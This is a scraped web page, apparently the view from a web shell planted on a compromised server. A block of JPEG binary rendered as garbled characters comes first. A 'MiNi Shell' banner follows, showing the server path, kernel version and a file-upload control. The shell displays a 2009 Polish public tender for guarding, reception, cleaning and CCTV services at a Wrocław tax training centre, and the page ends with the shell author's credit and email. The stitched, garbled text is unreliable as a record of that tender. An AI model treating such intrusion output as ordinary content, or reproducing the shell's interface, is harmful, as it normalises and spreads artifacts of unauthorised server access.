JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090312/60544-N-2009.html

<p class="kh_header"><b>Wrocław: Zamówienie publiczne nr ROKK-IS/ZP/0/2009  na kompleksową usługę w zakresie całodobowej ochrony mienia, w tym również:
-	świadczenie usług portierskich,
-	świadczenie usług recepcyjnych,
-	świadczenie usług związanych ze sprzątaniem pomieszczeń w ROKK-IS
-    objęcie obiektu stałym monitoringiem</b><br>
<b>Numer ogłoszenia: 60544 - 2009; data zamieszczenia: 12.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Kształcenia Kadr przy Izbie Skarbowej we Wrocławiu , ul. Sztabowa 100, 53-310 Wrocław, woj. dolnośląskie, tel. 071 79-85-236, faks 071 3732823.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rokk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gospodarstwo pomocnicze.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zamówienie publiczne nr ROKK-IS/ZP/0/2009  na kompleksową usługę w zakresie całodobowej ochrony mienia, w tym również:
-	świadczenie usług portierskich,
-	świadczenie usług recepcyjnych,
-	świadczenie usług związanych ze sprzątaniem pomieszczeń w ROKK-IS
-    objęcie obiektu stałym monitoringiem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest  kompleksowa  usługa  w  zakresie całodobowej  ochrony mienia   (Kod   CPV:  79710000-4  -  usługi  ochroniarskie)  w  siedzibie  Regionalnego Ośrodka  Kształcenia  Kadr  przy  Izbie  Skarbowej  we Wrocławiu,  świadczonej  przez pracowników    zatrudnionych    przez    Wykonawcę    oraz    objęcie   obiektu    stałym  monitoringiem   (Kod CPV: 32235000-9  - systemy nadzoru o obwodzie zamkniętym), a także:
- świadczenie usług portierskich, polegających na obsłudze portierni i pełnieniu   
  funkcji informacyjnej dla osób zainteresowanych działalnością ROKK-IS,
  (Kod CPV: 98841120-2  - usługi portierskie),
- świadczenie usług recepcyjnych wobec gości hotelowych
   (Kod CPV: 79992000-4  - usługi recepcyjne), 
- świadczenie usług  związanych ze sprzątaniem  pomieszczeń  biurowych  w   
  obiekcie ROKK-IS oraz pokoi hotelowych,
  (Kod CPV: 90919200-4  usługi sprzątania biur).
W celu ochrony obiektu i mienia Wykonawca zapewnia:
- opracowanie  projektu  oraz instalację systemu monitoringu -wykonane w 
  uzgodnieniu z  Zamawiającym,  na   koszt  Wykonawcy,  w  ciągu  1  miesiąca  
  od  daty  podpisania   umowy, w skład którego wchodzą: 
* kamery wewnętrzne kolorowe montowane na stałe z czujnikami ruchu +IR szt. 6,
*kamery kolorowe zewnętrzne, szybkoobrotowe szt. 2,
*pulpit sterujący do kamer szybkoobrotowych szt. 1
*rejestrator do kamer z dyskiem twardym o pojemności nie mniejszej niż 500GB 
  szt. 1,
*monitor kolorowy LCD min 19 szt. 1
*czujniki ruchu szt. 2.
- wykonanie  instalacji  systemu  monitoringu   zgodnie  z   obowiązującymi    
   przepisami prawa,
- dostarczenie dokumentacji powykonawczej zainstalowanego systemu 
   monitoringu ,
- konserwację zainstalowanego przez siebie systemu - w trakcie realizacji  
  zamówienia
- utrzymanie w stałej sprawności wszystkie zainstalowane urządzenia,     
- zatrudnienie przez Wykonawcę 1 osoby posiadającej Świadectwo kwalifikacji E 
  uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci na  
  stanowisku eksploatacji wydane przez Stowarzyszenie Elektryków Polskich 
Koszty związane z korzystaniem (w tym: z instalacją, dzierżawą, konserwacją) urządzeń potrzebnych  do realizacji usługi monitoringu  należy  uwzględnić  w  wynagrodzeniu należnym Wykonawcy za wykonanie przedmiotu zamówienia.
Po   zakończeniu  okresu   trwania   umowy,   Zamawiający  (lub   wskazana   jednostka administracji skarbowej) zastrzega sobie   możliwość  zakupu   systemu zamontowanego  przez  Wykonawcę   za   kwotę  nie  większą  niż wartość   rynkowa  na   dzień   zakupu  pomniejszona    o  stopień   zużycia.   W    sytuacji,  gdy   Zamawiający  (lub wskazana jednostka   administracji  skarbowej)  nie   będzie  zainteresowany  zakupem   systemu, Wykonawca   usunie  zainstalowane  przez   siebie  urządzenie   przywracając   wygląd  pomieszczeń  do stanu  sprzed montażu.
W zakresie ochrony Wykonawca zobowiązany jest szczególnie do:
- ochrony obiektu przed włamaniem  i kradzieżą mienia oraz jego dewastacją i 
   zniszczeniem, 
- ochrony-obserwacji obiektu w zakresie zagrożenia klęskami żywiołowymi oraz  
  dozoru nad bezpieczeństwem technicznym (awarie itp.), a  w  razie zaistnienia - 
  likwidowania  (minimalizowania) skutków zdarzeń losowych,
- w   razie   zauważenia   awarii   oraz  wszelkich występujących nieprawidłowości -  zawiadomienia  o fakcie Dyrektora Ośrodka, wezwania Wykonawcy, pogotowia lub 
  odpowiednich służb,
- zgłaszania   przedstawicielowi Zamawiającego wszelkich braków  lub   naruszeń   -
  mających wpływ na stan zabezpieczenia chronionego mienia,
- nie dopuszczania do przebywania na terenie Ośrodka osób nieupoważnionych,
- nie dopuszczanie do wnoszenia na teren Ośrodka niebezpiecznych materiałów oraz
  przedmiotów mogących stanowić zagrożenie,
- reagowania na niewłaściwe zachowanie osób przebywających na terenie  
  Ośrodka - interesantów,  uczestników  szkoleń, mieszkańców  hotelu,  
  uczestników  imprez  i uroczystości, 
- dbałości o mienie Ośrodka.
W zakresie usług portierskich zobowiązany jest do:
-  posiadania ogólnej wiedzy o strukturze ROKK-IS i prowadzonej działalności, w 
   celu udzielenia podstawowych informacji osobom zainteresowanym,
- wydawania i przyjmowania kluczy od pracowników przed rozpoczęciem i po 
   zakończeniu pracy oraz ich przechowywanie, w tym celu prowadzony będzie 
   rejestr gospodarki kluczami,
- dokonywania obchodów wewnętrznych obiektu, podczas których należy zwracać  
   uwagę na:
* zamknięcia poszczególnych pomieszczeń,
* sprawdzenie zamknięć wszystkich okien,
* wyłączenie urządzeń klimatyzacyjnych,
* wycieki wody z urządzeń grzewczych lub w pomieszczeniach sanitariatów,
* wyłączenie odbiorników prądu.
- sprawdzania stanu sal wykładowych po zakończeniu zajęć.
W zakresie usług recepcyjnych zobowiązany jest do :
-  zakwaterowania osób korzystających z pokojów hotelowych zgodnie z bieżącymi 
   poleceniami wydanymi przez Zamawiającego,
- prowadzenia książki meldunkowej,
- przyjmowania opłat od gości hotelowych i przekazywania niezwłocznie gotówki do 
  kasy ROKK-IS,
- po   zwolnieniu   pokoju   hotelowego,   sprawdzenia    pomieszczenia   pod   
  kątem bezpieczeństwa   ppoż.  (pozostawionych  niedopałków   papierosów,    
  włączonych odbiorników prądu),  zwrócenia  uwagi  na zamknięcie  okien, wycieki  
  wody  oraz ewentualne uszkodzenia lub braki w wyposażeniu należy zgłaszać 
  Zamawiającemu.
W  zakresie  usług  związanych  ze  sprzątaniem   pomieszczeń   w   ROKK-IS 
Wykonawca zobowiązany jest do:
-  świadczenia usług związanych ze sprzątaniem pomieszczeń w ROKK-IS, tj.:      
    a) pomieszczeń biurowych,
    b) sal wykładowych,
    c) pokoi hotelowych w budynkach A i B,
    d) korytarzy, schodów, holi itp.,
    e) toalet i pryszniców oraz innych pomieszczeń mieszczących się w siedzibie
        Zamawiającego,
-  podstawowe sprzątanie to : odkurzanie wykładzin dywanowych, podłoży  
   twardych,  zamiatanie, zmywanie na mokro, usuwanie pajęczyn, usuwanie kurzu i 
   czyszczenie mebli, lamp, sprzętów, szafek, grzejników, parapetów, listew, drzwi,  
   opróżnianie pojemników na śmieci,  mycie  i  dezynfekcja  wszystkich  urządzeń   
   sanitarnych (toalety i prysznice) usuwanie nalotów, mycie glazury luster i 
   armatury, zawieszanie kostek w muszlach, umieszczanie środków zapachowych 
   w pomieszczeniach WC, uzupełnianie mydła w płynie, ręczników papierowych, 
   papieru toaletowego, itp.    
Łączna powierzchnia w/w pomieszczeń wynosi około 1590 m. kw.
Wymagane  będzie  również  utrzymanie  czystości  pomieszczeń  w  dniach,  w  których odbywają się zajęcia na studiach podyplomowych, tj. w soboty i niedziele.
Zakres  świadczonych  usług obejmuje mycie okien w siedzibie Zamawiającego i 
pokojach hotelowych-2 razy w czasie trwania umowy w terminie do 30 kwietnia 2009 r. oraz 31 października 2009 r.
Wykonawca dokonuje w/w czynności:
      a)  własnym sprzętem,
      b) przy pomocy własnego personelu oraz pod własnym nadzorem,
      c) zakupuje na własny koszt środki czyszczące, dezynfekujące, zapachowe  
          oraz  worki   na  śmieci,
      d) we własnym zakresie zakupuje i dostarcza mydło w płynie, ręczniki 
          papierowe i papier toaletowy.
Wykonawca  zobowiązany  jest   w   czasie   wykonywania  usługi  zapewnić  na  terenie  objętym umową należyty ład, porządek, przestrzeganie przepisów bhp i ppoż. oraz  ponosi odpowiedzialność za  szkody powstałe w związku z realizacją usług oraz wskutek innych działań osób zatrudnionych przez Wykonawcę.
Wymagane  będzie   b i e ż ą c e   utrzymywanie   czystości   na   terenie   Ośrodka oraz niezwłoczne reagowanie na wystąpienie  wszelkich  nieprawidłowości  (np. zabrudzeń, braku mydła w płynie, ręczników papierowych, papieru toaletowego w toaletach itp.).
Wykonawca zobowiązany jest do stosowania materiałów i środków o nie niszczącym
działaniu na czyszczone elementy pomieszczeń jednakże skuteczne w użyciu i pomocne w dokładnym utrzymaniu czystości, o przyjemnym zapachu.
Pranie bielizny pościelowej odbywa się na koszt Zamawiającego, na podstawie odrębnie zawartej umowy.
Pomieszczenia, w których wykonywane będą czynności porządkowe - wyszczególnione zostały w wykazach stanowiących załącznik do SIWZ: nr 5 i 5a.
Sale wykładowe (w tym sala klubowa) wykorzystywane w godzinach od 8.00 do 20.00 na  szkolenia  i  kursy  organizowane  przez  ROKK-IS  w  ramach  swojej działalności statutowej, mogą  pomieścić do 300 słuchaczy .
Część hotelowa zawiera 33 miejsca noclegowe w 16 pokojach gościnnych
Pobyty gości hotelowych są zazwyczaj krótkoterminowe.
Każdorazowo, po zakończonym pobycie gościa w hotelu wymagane jest niezwłoczne sprzątnięcie pokoju i zmiana pościeli.
Przed opracowaniem oferty konieczne jest obejrzenie pomieszczeń ROKK-IS. 
Zamawiający będzie wymagał gwarancji wysokiej jakości świadczonych usług..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 32.23.50.00-9, 98.84.11.20-2, 79.99.20.00-4, 90.91.92.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiajcy nie wymaga wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
- posiadają uprawnienia do wykonywania określonej działalności lub czynności,  
  jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień; 
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
  technicznymi osobami zdolnymi do wykonania zamówienia lub przedstawią 
  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
  technicznego i osób zdolnych do  wykonania zamówienia: 
- znajdują   się   w   sytuacji   ekonomicznej   i   finansowej   zapewniającej   
  wykonanie  zamówienia ;
- nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na 
podstawie żądanych w pkt 7 niniejszego postępowania oświadczeń i dokumentów, wg formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 7.1.Do oferty wypełnionej na formularzu ofertowym stanowiącym załącznik nr 1 do 
     SIWZ,należy dołączyć:
7.2.Oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24  
     ust. 1 i 2 uPzp - stanowiące załącznik nr 2 do SIWZ.
7.3.Oświadczenie Wykonawcy o spełnieniu warunków określonych w art. 22 ust. 1  
     pkt 1-3 - stanowiące załącznik nr 3 do SIWZ.
7.4 wykaz wykonanych usług - stanowiący załącznik nr 7 do SIWZ
7.5.dokumenty potwierdzające  należyte wykonanie usług, o których mowa w pkt 
     11.1. SIWZ (referencje).
7.6.Wykaz   środków   czystości,   które  będą   zastosowane   przy   realizacji  
     zamówienia, stanowiący załącznik nr 4 do SIW,
7.7 oświadczenie Wykonawcy o zatrudnianiu przynajmniej 1 osoby posiadającej 
     Świadectwo kwalifikacji E uprawniające do zajmowania się eksploatacją  
     urządzeń, instalacji i sieci na stanowisku eksploatacji wydane przez 
     Stowarzyszenie Elektryków Polskich, stanowiące załącznik nr 8 do SIWZ.
7.8.Oświadczenie,  że   przez  cały  okres  obowiązywania  umowy  Wykonawca    
     będzie ubezpieczony od odpowiedzialności cywilnej OC w zakresie prowadzonej 
     działalności gospodarczej na sumę co najmniej 200 000 zł., stanowiący 
     załącznik nr 9      
7.9.Aktualny   odpis   z  właściwego  rejestru   albo  aktualne  zaświadczenie  o  
     wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają 
     wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, 
     wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7.10. Pełnomocnictwo do reprezentowania o ile ofertę składa pełnomocnik.
7.11. Jeżeli  Wykonawca   ma   siedzibę   lub   miejsce   zamieszkania   poza   
       terytorium Rzeczpospolitej  Polskiej, zamiast dokumentów, o których mowa w 
       pkt.7.5 składa dokument lub dokumenty wystawione zgodnie z prawem kraju,
       w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, 
       że nie otwarto jego likwidacji ani nie ogłoszono upadłości oraz nie orzeczono 
       wobec niego zakazu ubiegania się o zamówienie.     
7.12.Jeżeli w kraju pochodzenia osoby lub  w kraju, w którym Wykonawca ma 
       siedzibę lub miejsce  zamieszkania   nie  wydaje  się  dokumentów,  o  
       których  mowa  w  pkt  7.7. zastępuje się je dokumentem zawierającym 
       oświadczenie złożone przed notariuszem,    
       właściwym organem sądowym, administracyjnym albo organem samorządu   
       zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub 
       kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
7.13 .Zasady składania oferty przez podmioty występujące wspólnie :
   a) podmioty zobowiązane   są  do  złożenia   wraz   z   ofertą   pełnomocnictwa   
       do  reprezentowania wszystkich Wykonawców wspólnie ubiegających się o 
       udzielenie zamówienia,
   b) wymagane oświadczenia i dokumenty wskazane w p-tach 7.2; 7.3;7.4:7.6 
       powinny być  złożone przez każdy podmiot..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - doswiadczenie i przygotowanie fachowe - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.rokk.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalny Ośrodek Kształcenia Kadr przy Izbie Skarbowej we Wrocławiu, 
ul. Sztabowa 100,
53-310 Wrocław, pok. 104..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2009 godzina 10:00, miejsce: Regionalny Ośrodek Kształcenia Kadr przy Izbie Skarbowej we Wrocławiu, ul. Sztabowa 100,
53-310 Wrocław, pok. 104..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com